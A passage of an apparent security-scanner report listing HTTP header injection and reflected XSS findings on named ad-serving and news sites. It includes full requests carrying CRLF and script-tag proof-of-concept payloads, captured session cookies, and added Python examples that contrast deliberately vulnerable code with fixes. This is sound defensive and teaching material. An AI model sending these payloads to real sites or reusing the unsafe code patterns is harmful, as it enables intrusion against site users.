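The instances above all follow the same pattern: a path segment is pasted into a SQL string, one quote leaves the literal unclosed (the 500 with the OLE DB error), two quotes form an escaped quote and the query runs (the 302). The following is an added example, not code from the report or from the site it describes; it uses an in-memory SQLite table as a stand-in for the real Microsoft SQL Server database (the table name, columns and rows are assumptions). It shows the concatenated query failing under the same probe pair, the parameterised version that treats the quote as data, a handler that logs the driver error server-side and returns a generic page, and the scanner's quote/double-quote check run against both. The check also makes a point the remediation detail alone does not: hiding the error text removes the fingerprint but the 500-versus-404 difference still reveals the injection, so parameterisation is the fix and error suppression is only defence in depth.

```python
import sqlite3

# Constructed in-memory stand-in for the site's content database; the table,
# its columns and the rows are assumptions made for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (section TEXT, name TEXT, title TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", [
        ("store", "ins_ame_101117.htm", "Americas insight"),
        ("store", "shopping_cart.htm", "Shopping cart"),
    ])
    return conn

def lookup_unsafe(conn, section, name):
    # Vulnerable: the path segments are pasted into the SQL text. With
    # section = "store'" the literal becomes 'store'' ... and is never closed
    # (the scanner's first probe); with "store''" it becomes 'store''' which
    # parses as the value store' and the query runs cleanly (the second probe).
    sql = "SELECT title FROM pages WHERE section = '%s' AND name = '%s'" % (section, name)
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn, section, name):
    # Parameterised: the structure is fixed first, the values are bound second,
    # so a quote in either value is just data.
    sql = "SELECT title FROM pages WHERE section = ? AND name = ?"
    return [row[0] for row in conn.execute(sql, (section, name))]

GENERIC_ERROR = "<h1>An error occurred</h1>"
NOT_FOUND = "<h1>Page not found</h1>"

def handle(conn, section, name, lookup, log):
    """Serve GET /<section>/<name>; returns (status, body).
    The driver's error text goes to the server-side log, never into the response."""
    try:
        rows = lookup(conn, section, name)
    except sqlite3.Error as exc:
        log.append("%s: %s" % (type(exc).__name__, exc))
        return 500, GENERIC_ERROR
    if not rows:
        return 404, NOT_FOUND
    return 200, "<h1>%s</h1>" % rows[0]

def quote_probe(conn, section, name, lookup):
    """The scanner's check from the report: request section' and then section''
    and compare the two responses. True means they differ, i.e. the quote reached
    the SQL parser. Note the generic error page does not change this verdict:
    a 500 followed by a 404 is still a differential."""
    log = []
    one = handle(conn, section + "'", name, lookup, log)
    two = handle(conn, section + "''", name, lookup, log)
    return one != two
```

With the concatenated lookup the probe returns True even though the response body is generic; with the parameterised lookup both probes return the same 404 and the probe returns False.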
2. HTTP header injection
There are 8 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
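To make the two halves of this advice concrete, the following is an added example (not code from the report or from the ad server it describes). It builds a Set-Cookie header the vulnerable way from a URL-encoded request value, parses the resulting response the way a browser or proxy would, so that the extra header line and, with a doubled CRLF, the injected body are visible, and then shows the validator the remediation calls for: reject anything below 0x20, then require a short allow-listed token. The allow-list pattern is an assumption about what these cookie values are supposed to look like.

```python
import re
from urllib.parse import unquote

CRLF = "\r\n"

def set_cookie_unsafe(name, raw_value):
    # Vulnerable: the URL-decoded request value is written into the header line
    # as-is, so %0d%0a in the value becomes a real line break inside the headers.
    return "Set-Cookie: %s=%s; path=/" % (name, unquote(raw_value))

def response_unsafe(name, raw_value):
    # Minimal response around the vulnerable header, laid out as a server would send it.
    return CRLF.join([
        "HTTP/1.1 200 OK",
        "Content-Type: text/html",
        set_cookie_unsafe(name, raw_value),
        "",
        "<html></html>",
    ])

def parse_response(raw):
    """Split a response the way a browser or proxy does: (status line, headers, body).
    Headers end at the first blank line, so an injected CRLF CRLF moves everything
    after it into the body."""
    head, _, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip()] = value.strip()
    return lines[0], headers, body

# Allow-list for this value. That it should be a short opaque token is an
# assumption about the eyeblaster/flv/res/wmpv values, not something the report states.
TOKEN = re.compile(r"^[A-Za-z0-9._-]{1,64}$")

def validate_header_value(value):
    # Reject, never strip: first the report's minimum (anything below 0x20, plus DEL),
    # then the positive allow-list it recommends.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        raise ValueError("control character in header value")
    if not TOKEN.match(value):
        raise ValueError("header value does not match the allow-list")
    return value

def set_cookie_safe(name, raw_value):
    return "Set-Cookie: %s=%s; path=/" % (name, validate_header_value(unquote(raw_value)))
```

The report's payload only splits the Set-Cookie line in two; the constructed payload in the test adds a named header and a blank line, which is the response-splitting case the description above refers to.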
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload fb682%0d%0aeb8d44f6d4b was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerRedirect.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0fb682%0d%0aeb8d44f6d4b; F1=00UilH0003sY9QVZ; B2=; u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; E2=0aPa820ws3084ow80ws509KD820wrZ08.I820wrF08Y5g410s3066N820wrV02Edo41wsd06Bz820wrm0aVX820wsd07l0820wrU077Tg20wr+03sYg410sd0abMm5xos507fto20ws50a4cg410rM02WGSdzosb06IXPy9Ksd09EZ820ws303Mo820wrG04gILHW+s60apK820wrU0bKd820ws504uwg210rm07SK820wrM0bnAwy8ys505sM820wsc09bwg210s909KL820wrB; C3=; u3=1; ActivityInfo=0008uqbh0%5f000g3dbdR%5f; D3=;
The value of the Pos request parameter is copied into the Set-Cookie response header. The payload 25305%0d%0ad8582cf193d was submitted in the Pos parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp?FlightID=1923520&Page=&PluID=0&Pos=8190\25305%0d%0ad8582cf193d HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; F1=00UilH0003sY9QVZ; B2=; u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; E2=0aPa820ws3084ow80ws509KD820wrZ08.I820wrF08Y5g410s3066N820wrV02Edo41wsd06Bz820wrm0aVX820wsd07l0820wrU077Tg20wr+03sYg410sd0abMm5xos507fto20ws50a4cg410rM02WGSdzosb06IXPy9Ksd09EZ820ws303Mo820wrG04gILHW+s60apK820wrU0bKd820ws504uwg210rm07SK820wrM0bnAwy8ys505sM820wsc09bwg210s909KL820wrB; C3=; u3=1; ActivityInfo=0008uqbh0%5f000g3dbdR%5f; D3=;
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 671ca%0d%0a4758775fddb was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0671ca%0d%0a4758775fddb; F1=00UilH0003sY9QVZ; B2=; u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; E2=0aPa820ws3084ow80ws509KD820wrZ08.I820wrF08Y5g410s3066N820wrV02Edo41wsd06Bz820wrm0aVX820wsd07l0820wrU077Tg20wr+03sYg410sd0abMm5xos507fto20ws50a4cg410rM02WGSdzosb06IXPy9Ksd09EZ820ws303Mo820wrG04gILHW+s60apK820wrU0bKd820ws504uwg210rm07SK820wrM0bnAwy8ys505sM820wsc09bwg210s909KL820wrB; C3=; u3=1; ActivityInfo=0008uqbh0%5f000g3dbdR%5f; D3=;
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload f3d26%0d%0a75b00643908 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0f3d26%0d%0a75b00643908; F1=00UilH0003sY9QVZ; B2=; u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; E2=0aPa820ws3084ow80ws509KD820wrZ08.I820wrF08Y5g410s3066N820wrV02Edo41wsd06Bz820wrm0aVX820wsd07l0820wrU077Tg20wr+03sYg410sd0abMm5xos507fto20ws50a4cg410rM02WGSdzosb06IXPy9Ksd09EZ820ws303Mo820wrG04gILHW+s60apK820wrU0bKd820ws504uwg210rm07SK820wrM0bnAwy8ys505sM820wsc09bwg210s909KL820wrB; C3=; u3=1; ActivityInfo=0008uqbh0%5f000g3dbdR%5f; D3=;
The value of the flv request parameter is copied into the Set-Cookie response header. The payload 5ab67%0d%0a00ff500b54 was submitted in the flv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4069024%7E%7E0%5EebAdDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFoldDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebVideoPlayDuration%7E18%7E0%7E1%7E0%7E1%7E0%7E0%5EebVideoAssetDuration%7E18%7E0%7E1%7E0%7E1%7E11117176%7E0%5EebVideoFullPlay%7E0%7E0%7E1%7E0%7E1%7E11117176%7E0&OptOut=0&ebRandom=0.7502016185317189&flv=5ab67%0d%0a00ff500b54&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio
Origin: http://www.informationweek.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the res request parameter is copied into the Set-Cookie response header. The payload 8e592%0d%0a9007e5dc7c was submitted in the res parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4069024%7E%7E0%5EebAdDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFoldDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebVideoPlayDuration%7E18%7E0%7E1%7E0%7E1%7E0%7E0%5EebVideoAssetDuration%7E18%7E0%7E1%7E0%7E1%7E11117176%7E0%5EebVideoFullPlay%7E0%7E0%7E1%7E0%7E1%7E11117176%7E0&OptOut=0&ebRandom=0.7502016185317189&flv=10.1103&wmpv=0&res=8e592%0d%0a9007e5dc7c HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio
Origin: http://www.informationweek.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 1cada%0d%0a5d5c234479e was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4069024%7E%7E0%5EebAdDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFoldDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebVideoPlayDuration%7E18%7E0%7E1%7E0%7E1%7E0%7E0%5EebVideoAssetDuration%7E18%7E0%7E1%7E0%7E1%7E11117176%7E0%5EebVideoFullPlay%7E0%7E0%7E1%7E0%7E1%7E11117176%7E0&OptOut=0&ebRandom=0.7502016185317189&flv=10.1103&wmpv=1cada%0d%0a5d5c234479e&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio
Origin: http://www.informationweek.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload bf34f%0d%0aa00cfe1a23b was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
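The two contexts that appear in the instances below (a double-quoted attribute value and an HTML comment) need different treatment, and the following added example (not code from the report or from the sites it describes) shows both. The attribute case is handled by the entity encoding the remediation describes, covering every character it lists. The comment case is not: browsers do not decode entities inside a comment, so encoding leaves the value as-is and the only options are to reject anything that could close the comment or not to echo the value at all. The allow-list for a path segment is an assumption made for the example, and the form markup mirrors the snippet in the first instance rather than any real template.

```python
import re

# The report's rule: every HTML metacharacter, including < > " ' and =, is replaced
# with an entity at the point where the value is copied into the page.
ENTITIES = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
    "=": "&#61;",
}

def html_encode(value):
    return "".join(ENTITIES.get(ch, ch) for ch in value)

def form_action_unsafe(request_path):
    # Vulnerable: the request path lands inside a double-quoted attribute unmodified,
    # so a value containing "> closes the attribute and the tag.
    return '<form id="form2" method="post" action="%s">' % request_path

def form_action_safe(request_path):
    # Same template; the value is encoded so " > < cannot leave the attribute.
    return '<form id="form2" method="post" action="%s">' % html_encode(request_path)

# Comment context. Entity encoding does not help here, so the value is validated
# against an allow-list and rejected otherwise. The pattern (letters, digits, dot,
# underscore, single hyphens; no "--" and no ">") is an assumption about what a
# path segment on these URLs should look like.
SEGMENT = re.compile(r"^(?!.*--)[A-Za-z0-9._-]{1,80}$")

def comment_unsafe(segment):
    # Vulnerable: "-->" in the value ends the comment and what follows is live markup.
    return "<!-- requested segment: %s -->" % segment

def comment_safe(segment):
    if not SEGMENT.match(segment):
        raise ValueError("segment cannot be echoed inside an HTML comment")
    return "<!-- requested segment: %s -->" % segment

def has_script_tag(html):
    # Crude check used to compare the two outputs: does a literal <script> tag survive?
    return "<script>" in html.lower()
```

The point of the comment branch is the one the remediation detail under those instances makes: the fix for data echoed into a comment is validation or removal, not encoding.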
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72978"><script>alert(1)</script>ab87667034 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html72978"><script>alert(1)</script>ab87667034 HTTP/1.1
Host: 7thspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <html> <head> <title>Cloud Connect Launch Pad Finalist to Showcase MaxiScale FLEX Software Platform</title> <meta name="description" CO ...[SNIP]... <form id="7_comments_submit_form" method="post" action="/headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html72978"><script>alert(1)</script>ab87667034#cst" onsubmit="rememberfields()" style="display:none;"> ...[SNIP]...
3.2. http://7thspace.com/headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbed9"><script>alert(1)</script>d34128e6770 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html?fbed9"><script>alert(1)</script>d34128e6770=1 HTTP/1.1
Host: 7thspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <html> <head> <title>Cloud Connect Launch Pad Finalist to Showcase MaxiScale FLEX Software Platform</title> <meta name="description" CO ...[SNIP]... <form id="form2" method="post" action="/headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html?fbed9"><script>alert(1)</script>d34128e6770=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload ae786--><script>alert(1)</script>c1a688e3275 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstractae786--><script>alert(1)</script>c1a688e3275/10/4754/Messaging-Collaboration/research-social-networking.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:40:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:35 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ript%3Ealert%281%29%3C%2Fscript%3Ec1a688e3275%2F10%2F4754%2FMessaging-Collaboration%2Fresearch-social-networking.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstractae786--><script>alert(1)</script>c1a688e3275/10/4754/Messaging-Collaboration/research-social-networking.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 4cbf8--><script>alert(1)</script>caa7cf49b0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/104cbf8--><script>alert(1)</script>caa7cf49b0e/4754/Messaging-Collaboration/research-social-networking.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:00 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... script%3Ealert%281%29%3C%2Fscript%3Ecaa7cf49b0e%2F4754%2FMessaging-Collaboration%2Fresearch-social-networking.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/104cbf8--><script>alert(1)</script>caa7cf49b0e/4754/Messaging-Collaboration/research-social-networking.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 52eaf--><script>alert(1)</script>6554ec6cc27 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/10/475452eaf--><script>alert(1)</script>6554ec6cc27/Messaging-Collaboration/research-social-networking.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:06 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:06 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3Cscript%3Ealert%281%29%3C%2Fscript%3E6554ec6cc27%2FMessaging-Collaboration%2Fresearch-social-networking.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/10/475452eaf--><script>alert(1)</script>6554ec6cc27/Messaging-Collaboration/research-social-networking.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 305ab--><script>alert(1)</script>dcba560a1d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/10/4754/Messaging-Collaboration305ab--><script>alert(1)</script>dcba560a1d/research-social-networking.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:13 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45983
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Edcba560a1d%2Fresearch-social-networking.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration305ab--><script>alert(1)</script>dcba560a1d/research-social-networking.html"> ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload baf9c--><script>alert(1)</script>2532fb38a24 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/10/4754/Messaging-Collaboration/research-social-networking.htmlbaf9c--><script>alert(1)</script>2532fb38a24 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
